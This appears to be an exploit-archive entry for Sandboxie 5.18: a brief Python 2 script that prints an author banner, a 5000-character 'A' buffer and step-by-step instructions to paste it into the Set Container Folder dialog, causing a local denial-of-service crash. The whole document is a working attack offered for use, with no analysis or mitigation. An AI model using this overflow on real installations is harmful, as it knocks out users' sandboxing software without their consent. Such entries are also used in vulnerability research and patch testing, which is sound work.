id: 27851
date: 05/26/2017
title: Sandboxie 5.18 - Local Denial of Service Exploit
author: ScrR1pTK1dd13
cves: 

author = '''
    
                ##############################################
                #    Created: ScrR1pTK1dd13                  #
                #    Name: Greg Priest                       #
                #    Mail: ScR1pTK1dd13.slammer@gmail.com    # 
                ##############################################
    
# Exploit Title: Sandboxie version 5.18 local Dos Exploit
# Date: 2017.05.25
# Exploit Author: Greg Priest
# Version: Sandboxie version 5.18 ... Released on 13 April 2017
# Tested on: Windows7 x64 HUN/ENG Professional
'''
 
overflow = "A" * 5000
 
instruction = '''
 
<1> Copy printed "AAAAA..." string to clipboard!
<2> Sandboxie Control->Sandbox->Set Container Folder
<3> Paste the buffer in the input then press ok
'''
 
print author
print overflow
print instruction

#  0day.today [2023-03-21]  #